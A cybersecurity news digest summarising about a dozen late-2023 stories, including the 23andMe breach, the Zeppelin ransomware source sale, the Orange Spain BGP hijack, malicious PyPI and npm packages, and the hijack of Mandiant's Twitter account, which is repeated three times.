Daily Brief

23andMe experienced a data breach affecting the data of 6.9 million users due to compromised user credentials. The company blames the breach on users reusing passwords that had been compromised in unrelated security incidents. A lawsuit alleges the biotech firm failed to maintain reasonable security measures, which 23andMe denies. The company did not require two-factor authentication (2FA) prior to the breach but claims to have supported it since 2019. Infosec professionals criticize the response, suggesting the company should have had better security practices, like mandatory 2FA and checks for compromised credentials. There is a call within the industry for using services like HaveIBeenPwned to alert users of compromised credentials during account creation. Despite some industry support for the company's stance, the predominant view is that organizations are responsible for securing user data and should not blame users for breaches.

A threat actor has reportedly sold the source code and a cracked version of the Zeppelin ransomware builder for $500 on a hacker forum. The sale was identified by threat intelligence company KELA, though the authenticity of the offered package has not yet been confirmed. The acquisition of the source code could lead to the establishment of a new ransomware-as-a-service (RaaS) operation or development of new malware based on Zeppelin. The seller, known by the handle 'RET,' claimed to have cracked a licensed builder version of Zeppelin but did not create the malware. Despite law enforcement discovering flaws in Zeppelin's encryption scheme leading to a decrypter being built in 2020, the seller asserts the offered version has patched these vulnerabilities. Zeppelin is a derivative of Vega/VegaLocker malware, existing from 2019 to 2022, known for double-extortion tactics and significant ransom demands, previously selling for up to $2,300. In 2022, the FBI alerted the public to a new Zeppelin encryption method involving multiple layers to complicate victim's data recovery.

The FTC is offering a $25,000 prize for ideas to detect and prevent AI-enabled voice cloning, which poses risks of fraud. Voice cloning technology's advancements have sparked concerns about its misuse in acts such as voice phishing and social engineering scams. The Voice Cloning Challenge is part of an effort to proactively address the security threat posed by sophisticated text-to-speech AI systems. While voice cloning can benefit those needing assistive communication tools, its potential for abuse in fraudulent schemes is growing. Potential solutions will be judged on feasibility, impact on corporate accountability, burden on consumer, and adaptability to technological change. The competition is open for submissions until January 12th, with a detailed proposal and optional demonstration video required. If the challenge does not produce viable defenses, the FTC sees it as a warning signal that stricter AI regulations may be necessary.

Orange Spain experienced a massive outage due to an infostealer malware that harvested an employee's admin credentials. The compromised RIPE account had a "ridiculously weak" password ("ripeadmin"), which allowed attackers to disrupt half of the network's traffic. The attack was executed by an individual using the alias "Snow," who hijacked the provider's BGP traffic after breaching the RIPE account. RIPE, lacking mandatory 2FA or MFA and reasonable password policies, made Orange Spain's critical infrastructure particularly vulnerable. The attack led to incorrect routing associations within the network's BGP, resulting in service outages for customers. Despite the service disruption, there was no evidence of customer or client data being compromised. The incident highlights the risk of infostealer malware and poor cybersecurity practices, with experts anticipating potential future similar attacks on other RIPE accounts.

Executive Order on Improving the Nation's Cybersecurity highlights the importance of securing software supply chains, impacting those selling software to federal agencies and beyond. Protecting sensitive information such as API keys and credentials is critical, as shown by high-profile cybersecurity incidents where such data was exposed in plaintext. Tools like GitGuardian can scan code for inadvertently published secrets or prevent such occurrences, aiding in swift remediation and the prevention of future breaches. Building a comprehensive Software Bill of Materials (BOM) using Software Composition Analysis (SCA) tools helps in managing dependencies and vulnerabilities, ensuring transparency in software construction. Ethical hacking, a practice that involves the authorized probing of systems for security weaknesses, is crucial for identifying and mitigating potential exploits before software release. Adopting these proactive security measures and participating in programs like bug bounties can significantly reduce the risk of having to manage incidents post-deployment. Following the SLSA security framework can move software supply chain security "from 'safe enough' to being as resilient as possible," thus reducing post-deployment clean-up and regulatory reporting.

Law enforcement (LE) showcased progress against ransomware in 2023, including the takedown of high-profile gangs such as RagnarLocker, Qakbot, Hive, and partial disruption of AlphV/BlackCat. Despite successful operations by LE, the continued existence and activities of cybercrime groups like AlphV/BlackCat highlight the need for preventative measures beyond takedowns. AlphV/BlackCat, noteworthy for its reprehensible attacks including the leakage of sensitive patient data, still presents an active threat, revealing the limitations of current enforcement strategies. Discussions around combating ransomware with legislation include potentially banning ransom payments and outlawing poor security practices, though these approaches come with complications and may impact victims negatively. The article suggests that accountability and actions on cryptocurrency regulation may disrupt funding to cybercriminals, but current efforts from agencies like the UK's Financial Conduct Authority (FCA) are seen as insufficient. The fight against ransomware requires not just law enforcement actions but also the introduction of decisive policies and legislation by governments to tackle the issue more effectively. The challenge lies in crafting legislation that is effective without jeopardizing the operation of critical services like healthcare institutions, which cannot afford significant downtime. The article underscores the commitment of Western governments in continuing the fight against ransomware, acknowledging LE’s disruption efforts while stressing the need for legislative backing to reinforce and complement these efforts.

Three malicious Python packages were discovered in PyPI targeting Linux systems to deploy cryptocurrency miners. The packages, named modularseven, driftme, and catme, were downloaded 431 times before removal. Malicious code within the packages retrieved cryptocurrency mining scripts from remote servers. The malware operation resembled a previous campaign using a package called culturestreak, using similar domains and hosting strategies. Newer packages included an extra stage in the payload delivery process to avoid detection by security tools. Malicious commands were added to the ~/.bashrc file for persistence, ensuring the malware's continued operation on rebooted devices. The sophisticated evasion techniques highlight the importance of enhanced security measures for open-source repositories.

Four Chinese balloons were observed over the Taiwan Strait, with three crossing over Taiwan and near the island's Ching-Chuan-Kang air base. One balloon, previously shot down in US airspace, reportedly used a US internet provider for navigation and sent data back to China. US after the incident blacklisted six entities linked to China's military and the PLA's aerospace programs. Beijing denied intentional airspace intrusion, yet the Pentagon identified the balloon as having intelligence gathering capabilities. Taiwanese Ministry of Defense monitored accompanying PLA aircraft and PLAN vessels, with ongoing updates due to frequent appearances. The sighting of balloons over Taiwan's landmass is rare, often described as weather monitoring devices, but their purpose this time remains unconfirmed. Tensions rise as the balloon sightings precede Taiwan's presidential and parliamentary elections, amidst increasing CCP rhetoric about "reunification."

The npm package registry experienced a flood of over 3,000 packages during the holidays, creating significant implications for npm authors. A package named "everything" was introduced, scripted to download the entire npm package registry, quickly exhausting a computer's storage. As a consequence of npm’s dependency policy, the existence of "everything" prevented npm authors from removing their packages since they became dependencies for "everything." The package "everything" and its sub-packages created a cumbersome dependency chain that initiated the download of millions of transitive npm packages. The creator of "everything," PatrickJS, apologized for the unintended disruptions his package caused and has reached out to npm admins for a resolution. The npm policy preventing package removal if it's a dependency for others came in response to the "left-pad" incident in 2016 to ensure stability in the programming ecosystem. Even the author of "everything" faces difficulty in removing his packages due to the complex dependency web they created, which ironically is a result of the npm policy designed to prevent such disruptions. Actions were taken to mitigate the situation, with the "@everything-registry" scoped packages linked to "everything" being set to private, presumably to stop the cascade of downloads.

UAC-0050, identified as a threat actor since 2020, is using sophisticated phishing attacks to distribute the Remcos Remote Access Trojan (RAT). Recent attacks involve a new tactic that uses pipe methods for interprocess communication to avoid detection by antivirus and Endpoint Detection and Response (EDR) systems. The group targets Ukrainian and Polish entities using social engineering, often impersonating legitimate organizations to encourage opening malicious attachments. A phishing emails purported to offer consultancy roles with the Israel Defense Forces (IDF) was part of the campaign, primarily targeting Ukrainian military personnel. CERT-UA attributed a phishing campaign to UAC-0050 in Feb 2023, meant for delivering Remcos RAT and occasionally an information stealer named Meduza Stealer. Analysis of a specific LNK file revealed a complex infection process involving staged script execution and downloading additional payloads for persistence and data harvesting. The Remcos RAT has capabilities to extract system data and credentials from various web browsers, further compromising the security of infected systems.

American cybersecurity firm Mandiant's Twitter account was hijacked to promote a cryptocurrency scam. The incident, where the account was renamed and used to impersonate the Phantom crypto wallet service, lasted over six hours. The scam included a fake airdrop promotion that encouraged users to visit a malicious link. It's unclear how the breach occurred, but possibilities include MFA bypass or compromise of Twitter Support staff. Mandiant, a prominent threat intelligence organization, is a subsidiary of Google Cloud following a $5.4 billion acquisition. Mandiant regained control of their Twitter account; the current security status after the incident has not been detailed. The hacker's identity remains unknown, and further details are expected when Mandiant issues a statement.

Microsoft has disabled the ms-appinstaller URI protocol after detecting its misuse for malware installation. The issue echoes a vulnerability from December 2021, which allowed attackers to bypass security measures using App Installer spoofing. The protocol, reintroduced in August 2022, let users install apps from the web directly, without local storage requirements, but has been exploited by threat actors. Microsoft is working with certificate authorities to revoke certificates used by identified malware samples. Enterprises with the EnableMSAppInstallerProtocol group policy set to "Enabled" or not configured, using App Installer versions v1.18.2691 to v1.21.3421, and Windows updates from October 2022 to March 2023 are at risk and need updates. This change adds a layer of friction for web-based application installations, requiring additional steps for safe downloading and installation.

Mandiant's Twitter account was taken over by an attacker to spread a cryptocurrency scam. The hijacker renamed the account to mimic the Phantom crypto wallet and offered fake $PHNTM token airdrop. Clicking the scam 'Claim Airdrop' button redirects users to install a genuine wallet, which is then exploited to drain funds. Phantom Wallet has recognized the scam and blocked interaction with the malicious website to safeguard users. After the scam, the hijacker posted mocking messages to Mandiant and deleted the scam tweet. The scam included retweets from the official Phantom account to seem legitimate. Mandiant's original Twitter handle @mandiant is no longer available, displaying an error message that the account does not exist.

Mandiant's Twitter account was hijacked to disseminate a cryptocurrency scam, falsely representing the Phantom crypto wallet. An unauthorized actor took over Mandiant's account, changed its name to @phantomsolw, and advertised a fake airdrop of $PHNTM tokens. Users clicking on the 'Claim Airdrop' button were directed to a phishing site designed to drain cryptocurrency from their wallets. The legitimate Phantom wallet service has recognized the threat and disabled interactions with the scam website to protect users. Although the scam tweet has been deleted, the attacker continued to mock Mandiant with messages suggesting they change their password and check bookmarks. The hacker is retweeting official posts from Phantom, possibly to gain credibility for potential future scams. Mandiant's Twitter handle @mandiant is currently inaccessible, displaying a "This account doesn't exist" error message.

Estes Express Lines, a major American freight shipper, experienced a ransomware attack that potentially compromised the personal information of over 21,000 customers. The attack was first disclosed in early October, with the company eventually admitting the presence of ransomware after initially noting an IT infrastructure impact. The ransomware gang Lockbit claimed responsibility for the cyberattack and allegedly published the stolen data on November 13. Estes Express Lines decided not to pay the ransom, in line with FBI and financial regulator recommendations, despite potential risks of data exposure. Forensic investigations confirmed that personal information, including names and Social Security numbers, was stolen in the breach. The company has not disclosed specifics of the stolen data, the ransom amount requested, or detailed reasons for not paying the ransom. Estes is offering 12 months of free identity monitoring services through Kroll to the affected individuals and has not observed any cases of identity theft or financial loss from the incident.